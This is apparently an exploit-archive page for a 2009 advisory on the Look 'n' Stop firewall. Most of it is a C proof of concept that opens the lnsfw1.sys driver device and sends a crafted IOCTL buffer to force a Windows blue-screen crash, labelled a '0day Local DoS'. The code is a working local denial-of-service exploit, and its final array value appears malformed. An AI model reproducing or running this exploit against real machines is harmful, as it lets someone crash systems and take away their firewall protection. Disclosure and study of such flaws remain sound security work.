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Look n stop 0day Local Dos

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
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Look 'n' Stop Firewall 2.07 prevents data transmission to hacker's computers and protects from external intrusions. lnswf1.sys driver vulnerability causes BSOD with specific IOCTL value

Code

                                                #include <stdio.h>
#include <windows.h>
#include <winioctl.h>
#include <stdlib.h>
#include <string.h>

/*
Program          : Look 'n' Stop 2.06p4 / 2.07 (6.0.2900.5512)
Homepage         : http://www.looknstop.com
Discovery        : 2009/11/08
Author Contacted : 2010/07/15 ... no reply
Found by         : Heurs
This Advisory    : Heurs
Contact          : [email protected]


//----- Application description

Look 'n' Stop Firewall 2.07 provides key features to protect your computer
against cyber threats. It prevents malicious programs from transmitting the
data of your computer to hacker's computers. Look 'n' Stop Firewall 2.07
also protects your computer from external intrusions.

//----- Description of vulnerability

lnsfw1.sys driver generate a BSOD with particular value of IOCTL. Kernel wait
an action with a kernel debugger.

//----- Credits

http://www.sysdream.com
http://www.hackinparis.com/
http://ghostsinthestack.org

s.leberre at sysdream dot com
heurs at ghostsinthestack dot org

*/

int __cdecl main(int argc, char* argv[])
{
    HANDLE hDevice = (HANDLE) 0xffffffff;
    DWORD NombreByte;
    DWORD Crashing[] = {
        0x200ff822, 0xd24b37a1, 0x8ce055dc, 0x70b3d269,
        0x3d2ef498, 0xcdd0e57c, 0xf2699fab, 0xed753dcb,
        0xfdde2a99, 0x90590b61, 0x28011112, 0xeb35191c,
        0x36f0e1e7, 0xef7ee764, 0x09b01e1f, 0x0bb86825,
        0x1b886612, 0xd8c289df, 0xaa21ad45, 0x6fa7a76d,
        0x13492a54, 0x7c2bc443, 0x65dbf582, 0xffeb86cc,
        0xf48ca4fd, 0x75542bb5, 0xd05638ba, 0x3876e368,
        0x678ba399, 0x6779f15c, 0x8f89ff55, 0xc8b9cf02,
        0x033b9857, 0x82eef1a9, 0xf0dba3b6, 0xadf5b8f6,
        0x033ef961, 0x393f043b, 0x515896fd, 0x28d10e25,
        0x37b7f707, 0x1a425f92, 0x4bc6acfb, 0x45390605,
        0x0be40107, 0xf121a706, 0x4b4c0e31, 0x88889f12,
        0x0c60806d, 0x03af4569, 0xe5b68798, 0xb22bd966,
        0xd532fe7f, 0x19a7213a, 0x6927f7f5, 0xcd4c3202,
        0x96831f6b, 0x1d09991d, 0x48d1da67, 0x68f24415,
        0xbb01a216, 0xdb6b634a, 0x18e36cb4, 0xcd7265c2,
        0x64b81111, 0x4305d1b3, 0xc4f1ee8d, 0xfcd61343,
        0xb8bfc8b9, 0x8a1a5541, 0xe9c3adcb, 0xca4c2a56,
        0x89a67e7d, 0x74b8704e, 0xfe70e4d6, 0x27612082,
        0xd8e211d7, 0x190ec39c, 0x380dfc09, 0x8d649b0c,
        0xeda15e23, 0xe2e76319, 0xc781f249, 0x4cb25434,
        0xeff3dc6a, 0xa0a6e976, 0x57014474, 0x98629b36,
        0x2cc9fb9d, 0xa6a8b31b, 0xa3fbef44, 0xfeb130d3,
        0x91e8c96b, 0xdc953762, 0x77341f7c, 0xd4ec9d26,
        0x8504a663, 0x1da0406a, 0x8a049adf, 0x0f2ca8ef,
        0xbc93ec1e, 0x027bdfad, 0x4c8885f6, 0x1c30be98,
        0x0ec01493, 0x124d4252, 0x0765f8c1, 0x801652da,
        0x778a6e6a, 0x09ef17aa, 0x6ece13fd, 0xa7280f9c,
        0xcf6235f9, 0xabdeae81, 0x8145979e, 0x45af7871,
        0xed3d36e0, 0x9e223b88, 0xfe26e7f2, 0xe13743f1,
        0xa8171a6e, 0x611c303f, 0x252a68d2, 0xd013e026,
        0x1259b868, 0xf673c420, 0x27a60840, 0xd87eed92,
        0xef872203, 0x26868592, 0x18324bc9, 0xed47e068,
        0xf2c0b162, 0x95966d8e, 0x07cc53db, 0xe8360489,
        0x7c630b42, 0x8ab52dd9, 0xc5bf0c0e, 0xae8a8284,
        0x97a0a5ab, 0x0cccb1c4, 0x4d768275, 0x1101e67e,
        0x16e2f2c3, 0x82b7686a, 0x5b26314e, 0x52f74f38,
        0xcb341107, 0xa59c70d0, 0x3327af19, 0xdd51188f,
        0x54636221, 0xa05f288a, 0xeb7d4a3a, 0x2065885d,
        0xb103190e, 0xd36e7e1e, 0xf7a7d560, 0xc62c828d,
        0x9fc687e9, 0xcf609352, 00e96253
        };
    BYTE Out[0x20];
    
    printf("0day Local DoS - Look 'n' Stop 2.06p4\n\n");
    hDevice = CreateFile("\\\\.\\LNSFW1",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL);
    printf("%x\n",hDevice);
    
    DeviceIoControl(hDevice,0x80000064,Crashing,0x28b,0,0,&NombreByte,NULL);
    
    printf("Sploit Send.\n\n");
    CloseHandle(hDevice);
    getch();
    return 0;
}



                              

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